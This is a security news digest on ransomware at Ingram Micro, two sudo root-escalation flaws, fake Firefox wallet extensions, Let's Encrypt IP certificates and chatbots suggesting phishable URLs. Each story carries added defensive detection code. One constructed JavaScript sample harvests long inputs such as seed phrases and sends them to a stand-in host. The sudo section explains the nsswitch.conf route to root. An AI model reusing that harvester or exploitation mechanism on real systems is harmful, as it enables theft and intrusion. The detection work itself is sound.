Ingram Micro Suffers Global Outage Following SafePay Ransomware Attack
Critical Sudo Vulnerabilities Enable Local Users to Gain Root Access Across Major Linux Distributions
Over 40 Fake Cryptocurrency Wallet Extensions Infiltrate Firefox Store to Steal Digital Assets
Let's Encrypt Introduces Free IP Address Certificates, Challenging Traditional Domain Name Model
ChatGPT URL Errors Create New Phishing Opportunities for Cybercriminals
Ingram Micro Suffers Global Outage Following SafePay Ransomware Attack
IT distribution giant Ingram Micro is experiencing a widespread system outage following a SafePay ransomware attack late last week, which forced the company to shut down internal systems and disrupted services worldwide. The attack has left the company's website and online ordering systems inaccessible, and employees found ransom notes on their devices as the breach was uncovered. Sources indicate the threat actors gained initial access through Ingram Micro's GlobalProtect VPN platform; the company has since told employees not to use the VPN and directed some staff to work from home as a precaution.
The attack has significantly impacted Ingram Micro's core business operations, including the AI-powered Xvantage distribution platform and the Impulse license provisioning platform, both essential to the company's technology distribution services for resellers and managed service providers worldwide. Some internal services, including Microsoft 365, Teams, and SharePoint, continue to operate normally, so basic communications still function. The company has not publicly acknowledged a ransomware attack; its only statements so far are internal advisories about ongoing IT issues that do not describe the security incident to employees or customers.
The SafePay ransomware group, which emerged in November 2024, has rapidly become one of the more active ransomware operations of 2025, accumulating over 220 victims in under a year. The group is known for entering corporate networks through VPN gateways using compromised credentials and password spray attacks, so organizations whose VPN portals accept a username and password with no second factor and no lockout or rate limiting are particularly exposed. The attack on Ingram Micro, one of the world's largest business-to-business technology distributors, shows the growing reach of ransomware operations and has potential implications for the broader technology supply chain that depends on the company's distribution and service capabilities.
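A password spray against a VPN portal has a recognisable shape in the authentication log: one source fails logins for many different accounts in a short window, then one of them succeeds. The following is an added example (not Ingram Micro's, Palo Alto's or SafePay's code) of that detection run over constructed log lines; the log format, the ten-minute window and the eight-account threshold are assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Log format is an assumption for this example (vendor formats differ): one
# authentication event per line with timestamp, source IP, user and outcome.
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})Z gp-auth "
    r"src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>success|failure)$"
)

# Constructed sample: one user mistyping a password (benign), then one source
# trying nine different accounts in under a minute and finally getting in as carol.
SAMPLE_LOG = [
    "2025-07-03T22:10:00Z gp-auth src=203.0.113.5 user=alice result=failure",
    "2025-07-03T22:10:20Z gp-auth src=203.0.113.5 user=alice result=failure",
    "2025-07-03T22:10:45Z gp-auth src=203.0.113.5 user=alice result=success",
] + [
    f"2025-07-03T22:14:{i * 6:02d}Z gp-auth src=198.51.100.7 user={u} result=failure"
    for i, u in enumerate(
        ["bob", "carol", "dave", "erin", "frank", "grace", "heidi", "ivan", "judy"]
    )
] + [
    "2025-07-03T22:16:30Z gp-auth src=198.51.100.7 user=carol result=success",
]


def parse_events(lines):
    """Return (timestamp, src, user, result) tuples, oldest first; unparseable lines are skipped."""
    events = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S").replace(tzinfo=timezone.utc)
        events.append((ts, m["src"], m["user"], m["result"]))
    return sorted(events)


def detect_spray(lines, window=timedelta(minutes=10), min_users=8):
    """Flag a source that fails logins for >= min_users distinct accounts inside
    `window`. One wrong password repeated for one account never trips this rule;
    many accounts from one source does, which is the shape of a spray. For each
    hit, also report accounts that then succeeded from that source, since that
    is the credential the intruder will use on the VPN.
    """
    by_src = defaultdict(list)
    for ev in parse_events(lines):
        by_src[ev[1]].append(ev)

    alerts = []
    for src, evs in by_src.items():
        fails = [e for e in evs if e[3] == "failure"]
        for i, (start, _, _, _) in enumerate(fails):
            in_window = [e for e in fails[i:] if e[0] - start <= window]
            users = {e[2] for e in in_window}
            if len(users) < min_users:
                continue
            end = in_window[-1][0]
            successes = sorted({e[2] for e in evs
                                if e[3] == "success" and start <= e[0] <= end + window})
            alerts.append({"src": src, "start": start.isoformat(),
                           "distinct_users": len(users), "successes_after": successes})
            break  # one alert per source is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_LOG):
        print(alert)
```

The `successes_after` field is the part worth paging on: a success for an account that was part of the spray is the compromised credential, and that session should be terminated and the password reset before the intruder moves from the VPN into the network.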
Critical Sudo Vulnerabilities Enable Local Users to Gain Root Access Across Major Linux Distributions
https://thehackernews.com/2025/07/critical-sudo-vulnerabilities-let-local.html
Cybersecurity researchers have disclosed two security flaws in the Sudo command-line utility for Linux and Unix-like operating systems that allow local attackers to escalate their privileges to root on vulnerable machines. The vulnerabilities, designated CVE-2025-32462 and CVE-2025-32463, were discovered by Stratascale researcher Rich Mirch and are fixed in Sudo 1.9.17p1. The first has existed undetected for over 12 years since its introduction in September 2013 and affects Sudo 1.8.8 through 1.9.17; the second is a critical-severity flaw in the chroot functionality, which was added in 1.9.14, and affects 1.9.14 through 1.9.17.
CVE-2025-32462, with a CVSS score of 2.8, abuses Sudo's host option (-h/--host), which was only meant for listing privileges (sudo -l) for another host but was also honored when running commands. A user whose sudoers rule names some other host can pass that host name with -h and have the rule match on the local machine, so a common sudoers file distributed across a fleet, or LDAP-based sudoers (including via SSSD), ends up granting commands on machines the rule was never meant for. CVE-2025-32463 carries a critical CVSS score of 9.3 and abuses Sudo's chroot option (-R/--chroot): sudo changed root into the user-chosen directory before resolving users and groups through NSS, so an /etc/nsswitch.conf planted in that directory can name a shared library that sudo then loads as root. Any unprivileged local user can exploit this, even with no sudo rules defined for them.
The vulnerabilities have been addressed in Sudo version 1.9.17p1 released in late June 2025, following responsible disclosure on April 1, 2025. Major Linux distributions including AlmaLinux, Alpine Linux, Amazon Linux, Debian, Gentoo, Oracle Linux, Red Hat, SUSE, and Ubuntu have issued security advisories and patches to address these flaws. Sudo project maintainer Todd C. Miller announced that the chroot option will be completely removed from future releases, citing that supporting user-specified root directories is inherently error-prone and poses significant security risks to system integrity.
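The practical questions for a fleet are which CVEs a given sudo build is exposed to, and, until the fix lands, which rules in a shared sudoers file name other hosts and are therefore reachable through CVE-2025-32462. The following is an added example (not the Sudo project's or Stratascale's code) that answers both from `sudo -V` output and a sudoers file; the affected ranges are the published ones, while the sample sudoers fragment and its host names are constructed.

```python
import re
import shutil
import subprocess

# Affected ranges as published in the advisories; both flaws are fixed in 1.9.17p1.
FIXED_IN = "1.9.17p1"
AFFECTED = {
    "CVE-2025-32462": ("1.8.8", "1.9.17"),   # -h/--host honored for command execution
    "CVE-2025-32463": ("1.9.14", "1.9.17"),  # -R/--chroot NSS lookup inside user-chosen root
}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:p(\d+))?$")


def version_key(version):
    """'1.9.16p2' -> (1, 9, 16, 2). A release without a pN suffix sorts as p0."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised sudo version: {version!r}")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def parse_sudo_version(sudo_v_output):
    """Extract the version from `sudo -V` text ('Sudo version 1.9.16p2' on the first line)."""
    m = re.search(r"^Sudo version (\S+)", sudo_v_output, re.MULTILINE)
    return m.group(1) if m else None


def affected_cves(version):
    """CVEs whose published range contains `version`; empty once 1.9.17p1 or later."""
    key = version_key(version)
    if key >= version_key(FIXED_IN):
        return []
    return [cve for cve, (lo, hi) in AFFECTED.items()
            if version_key(lo) <= key <= version_key(hi)]


# Constructed sudoers fragment of the kind that is shared across a fleet; the
# host names and rules are assumptions for the example.
SAMPLE_SUDOERS = """
Defaults env_reset
Host_Alias DBHOSTS = db01, db02
alice ALL = (ALL) ALL
bob db01 = (root) /usr/bin/systemctl restart postgresql
carol DBHOSTS = (root) /bin/ls
"""

_HOST_ALIAS_RE = re.compile(r"^Host_Alias\s+(\w+)\s*=\s*(.+)$")
_RULE_RE = re.compile(r"^(\S+)\s+(\S+)\s*=")
_SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Cmnd_Alias", "@")


def foreign_host_rules(sudoers_text, local_hostname):
    """(user, host-spec) pairs whose host field names neither ALL nor this host.

    On an unpatched sudo these rules are reachable here via `sudo -h <that host>`,
    so they are the ones to review before the fix lands. Host aliases are expanded;
    line continuations and '#' inside command strings are not handled.
    """
    aliases, found = {}, []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(_SKIP_PREFIXES):
            continue
        m = _HOST_ALIAS_RE.match(line)
        if m:
            aliases[m.group(1)] = {h.strip() for h in m.group(2).split(",")}
            continue
        m = _RULE_RE.match(line)
        if not m:
            continue
        user, host_spec = m.groups()
        hosts = set()
        for h in host_spec.split(","):
            hosts |= aliases.get(h, {h})
        if "ALL" in hosts or local_hostname in hosts:
            continue
        found.append((user, host_spec))
    return found


if __name__ == "__main__":
    if shutil.which("sudo"):
        out = subprocess.run(["sudo", "-V"], capture_output=True, text=True).stdout
        ver = parse_sudo_version(out)
        if ver:
            print(f"sudo {ver}: {', '.join(affected_cves(ver)) or 'not affected'}")
    print("rules for other hosts (sample, as web01):", foreign_host_rules(SAMPLE_SUDOERS, "web01"))
```

There is no sudoers-side mitigation for CVE-2025-32463, since it needs no rule at all; the version check is the one that matters there, and distribution packages may carry the fix under a backported version string, so compare against the vendor advisory rather than the upstream number alone.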
Over 40 Fake Cryptocurrency Wallet Extensions Infiltrate Firefox Store to Steal Digital Assets
https://blog.koi.security/foxywallet-40-malicious-firefox-extensions-exposed-4c14419de486
More than 40 malicious browser extensions impersonating popular cryptocurrency wallets have flooded Firefox's official add-ons store, designed to steal wallet credentials and sensitive data from unsuspecting users. The fake extensions masquerade as legitimate wallets from trusted providers including Coinbase, MetaMask, Trust Wallet, Phantom, Exodus, OKX, Keplr, and MyMonero, incorporating malicious code that exfiltrates stolen information to attacker-controlled servers. Researchers at Koi Security discovered the campaign and identified evidence pointing to a Russian-speaking threat group behind the operation, which has been active since at least April 2025 with new malicious entries appearing as recently as last week.
The malicious extensions are clones of the open-source releases of the legitimate wallets, with added code that watches for sensitive input. Input and click event listeners capture field contents and keep only strings longer than 30 characters, a filter that selects realistic private keys and seed phrases, which are then sent quietly to attacker-controlled servers. The extensions set the opacity of error dialogs to zero so that victims see no sign of the activity while their recovery phrases are exfiltrated. Because a seed phrase is the master key to a wallet, whoever holds it can drain every asset in it through transactions that look legitimate and cannot be reversed.
Despite Mozilla's development of an early detection system for crypto scam extensions that uses automated indicators and human reviewers, the fake wallet extensions continue to proliferate in the Firefox store. The threat actors build credibility by using authentic logos from the brands they impersonate and generating hundreds of fake five-star reviews, though some extensions also display numerous one-star reviews from victims reporting the scam. Although Koi Security reported their findings to Mozilla through official channels, the malicious extensions remained available at the time of their report, highlighting the ongoing challenge of combating cryptocurrency-focused malware in browser extension marketplaces where the sheer volume of fake reviews often exceeds actual installation numbers.
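The behaviour described above (input and click listeners, a length filter around 30 characters, an outbound request to an external origin, and error dialogs hidden with opacity zero) can be turned into a static triage pass over an extension's scripts. The following is an added example, not Koi Security's tooling or code from any of the reported extensions; the indicator weights and verdict thresholds are assumptions, and the two JavaScript samples it scans are constructed for the example.

```python
import re
import zipfile

# Indicator regexes mirror the behaviour Koi Security describes; the weights and
# verdict thresholds are assumptions chosen for this example.
INDICATORS = [
    ("input-or-click-listener",
     re.compile(r"""addEventListener\s*\(\s*["'](?:input|click|keyup|keydown|change|paste)["']"""), 1),
    ("length-threshold-filter",            # e.g. value.length > 30
     re.compile(r"\.length\s*>=?\s*(?:[2-4]\d)\b"), 2),
    ("exfil-to-external-origin",           # fetch/XHR/beacon near an http(s) URL
     re.compile(r"\b(?:fetch|XMLHttpRequest|sendBeacon)\b[\s\S]{0,200}?https?://(?!localhost|127\.)"), 3),
    ("hidden-error-dialog",                # opacity set to exactly 0, not 0.5 etc.
     re.compile(r"""opacity\s*[:=]\s*["']?0(?:\.0+)?["']?(?![.\d])"""), 1),
]
_URL_HOST_RE = re.compile(r"""https?://([^\s"'/`)]+)""")


def triage_script(source):
    """Score one script. Returns findings, score, outbound hosts and a verdict."""
    findings = [name for name, rx, _ in INDICATORS if rx.search(source)]
    score = sum(w for name, _, w in INDICATORS if name in findings)
    hosts = sorted({h.lower() for h in _URL_HOST_RE.findall(source)})
    verdict = ("likely-harvester" if score >= 6
               else "review" if score >= 3 else "low")
    return {"findings": findings, "score": score, "external_hosts": hosts, "verdict": verdict}


def triage_xpi(path):
    """Run triage_script over every .js inside a Firefox .xpi (a zip archive)."""
    with zipfile.ZipFile(path) as archive:
        return {name: triage_script(archive.read(name).decode("utf-8", "replace"))
                for name in archive.namelist() if name.endswith(".js")}


# Constructed samples (not code from any of the reported extensions): the first
# has the shape described above, the second is an ordinary click handler.
CONSTRUCTED_SUSPECT = r'''
document.addEventListener("input", (e) => {
  const v = (e.target && e.target.value) || "";
  if (v.length > 30) {
    fetch("https://collector.example/api/submit", { method: "POST", body: v });
  }
});
document.addEventListener("click", () => {
  const err = document.querySelector(".error-dialog");
  if (err) err.style.opacity = "0";
});
'''
CONSTRUCTED_BENIGN = r'''
document.getElementById("send").addEventListener("click", () => {
  browser.runtime.sendMessage({ type: "sign", payload: form.value });
});
'''

if __name__ == "__main__":
    for label, src in (("suspect", CONSTRUCTED_SUSPECT), ("benign", CONSTRUCTED_BENIGN)):
        print(label, triage_script(src))
```

A listener on its own is normal for any wallet UI, which is why it carries the lowest weight; the combination of a length filter and an outbound request to a host that is not the wallet vendor's is what moves a script into the "likely-harvester" band. Minified or obfuscated bundles will defeat these regexes, so a "low" result is a reason to read the code, not a clean bill of health.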
Let's Encrypt Introduces Free IP Address Certificates, Challenging Traditional Domain Name Model
https://letsencrypt.org/2025/07/01/issuing-our-first-ip-address-certificate/
Let's Encrypt, the certificate authority known for providing free TLS/SSL certificates, has begun issuing certificates for IP addresses at no cost. Commercial offerings such as PositiveSSL, Sectigo, and GeoTrust sell IP address certificates for roughly $40 to $90 a year, so a free option is a notable shift in the certificate landscape. It lets operators with a static IP address serve HTTPS on the bare address, without buying a domain name (typically $10 to $50 a year).
The new IP address certificates serve several practical purposes, according to Aaron Gable, principal engineer at Let's Encrypt. Hosting providers can use them to create default landing pages when users type IP addresses directly into browsers, similar to how Cloudflare handles 1.1.1.1 and Google manages 8.8.8.8. The certificates also benefit servers supporting DNS over HTTPS protocols and can secure short-lived connections for server administration or home network devices like network-attached storage servers.
However, the offering comes with limitations and security considerations. Let's Encrypt issues IP address certificates only under its short-lived profile, with six days of validity, part of the industry's broader move toward short-lived certificates that shrink the window in which a compromised key is usable and reduce reliance on revocation. Because there is no DNS name to publish a record for, control of an IP address is proven with the http-01 or tls-alpn-01 challenge; dns-01 is not available for IP identifiers. Let's Encrypt also notes drawbacks of IP-based sites: dynamically allocated ISP addresses change, there are no established dispute rules for IP addresses as there are for domain names, and a later move to a different address requires redirects that can hurt load times and search ranking. The feature is currently available in Let's Encrypt's staging environment, with general availability planned for later this year.
ChatGPT URL Errors Create New Phishing Opportunities for Cybercriminals
https://www.netcraft.com/blog/large-language-models-are-falling-for-phishing-scams
ChatGPT and other AI chatbots are providing incorrect website URLs for major companies at alarming rates, creating new opportunities for cybercriminals to exploit unsuspecting users. According to research by threat intelligence firm Netcraft, GPT-4.1 family models deliver the correct web address only 66 percent of the time when asked for company login pages. The remaining responses include 29 percent that point to dead or suspended sites and 5 percent that direct users to legitimate but incorrect websites.
This is a security risk because the unregistered or abandoned domains that appear in chatbot answers can simply be bought by criminals and turned into phishing sites, so the chatbot itself routes victims to the attacker. Rob Duncan, Netcraft's lead of threat research, explained that attackers only need to identify the mistakes the AI models are making and then take advantage of them. The problem stems from the models predicting plausible-sounding URLs from word associations rather than checking whether a URL exists or evaluating a site's reputation, which leaves them open to manipulation by phishing operations.
Cybercriminals are already adapting their tactics to target AI-powered search behaviors, moving away from traditional search engine optimization to focus on poisoning chatbot results. Netcraft researchers discovered attackers creating elaborate fake ecosystems, including dozens of GitHub repositories, Q&A documents, tutorials, and fake social media accounts, all designed to trick AI systems into recommending malicious resources. This represents a significant evolution in phishing techniques, as criminals recognize that users increasingly rely on AI chatbots instead of conventional search engines while remaining unaware that these systems can provide incorrect information.
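The defensive counterpart to the finding above is to treat a model-supplied URL as untrusted input and check it against a curated brand-to-domain table before anyone clicks it, flagging hosts that contain the brand name but are not on that list, which is exactly the kind of domain a squatter would register. The following is an added example, not Netcraft's code; the brand `examplebank`, its `.example` domains and the sample URLs are constructed, and the two-label registrable-domain approximation is an assumption that real code should replace with the Public Suffix List.

```python
from urllib.parse import urlsplit

# Constructed allowlist of registrable domains per brand; the brand and the
# .example domains are assumptions for this example. In production this table
# comes from the brand itself or a vetted source, never from a model.
BRAND_DOMAINS = {
    "examplebank": {"examplebank.example", "examplebank-secure.example"},
}


def registrable_domain(host):
    """Approximate eTLD+1 as the last two labels. Production code should use the
    Public Suffix List so that e.g. co.uk is handled correctly."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def classify_suggested_url(brand, url):
    """Classify a login URL a chatbot produced for `brand`.

    trusted          https on a domain from the allowlist (subdomains included)
    insecure-scheme  allowlisted domain but plain http
    lookalike        the brand name appears in a host that is not allowlisted,
                     i.e. exactly the kind of domain a squatter would register
    unrelated        some other host; still not to be followed blindly
    invalid          not an http(s) URL with a host
    """
    parts = urlsplit(url.strip())
    host = parts.hostname  # drops userinfo and port, so brand@evil tricks do not fool it
    if parts.scheme not in ("http", "https") or not host:
        return "invalid"
    host = host.lower()
    if registrable_domain(host) in BRAND_DOMAINS.get(brand, set()):
        return "trusted" if parts.scheme == "https" else "insecure-scheme"
    if brand in host.replace("-", "").replace("_", ""):
        return "lookalike"
    return "unrelated"


def screen_suggestions(brand, urls):
    """Run a batch of model-supplied URLs; only 'trusted' ones may be acted on."""
    return {u: classify_suggested_url(brand, u) for u in urls}


# Constructed set of URLs of the kinds a model might hand back for a login page.
CONSTRUCTED_SUGGESTIONS = [
    "https://login.examplebank.example/signin",
    "http://examplebank.example/login",
    "https://examplebank-login.example/",
    "https://accounts.other.example/",
    "https://examplebank.example@phish.example/login",
    "examplebank.example/login",
]

if __name__ == "__main__":
    for url, verdict in screen_suggestions("examplebank", CONSTRUCTED_SUGGESTIONS).items():
        print(f"{verdict:16} {url}")
```

The check is deliberately offline; the second half of Netcraft's finding, that many suggested domains are dead or unregistered, needs a DNS or WHOIS lookup and belongs in the same pipeline but is not part of this block. A "lookalike" verdict on a domain that does not yet resolve is the case to act on fastest, since it is an address a model is already recommending that an attacker can still register.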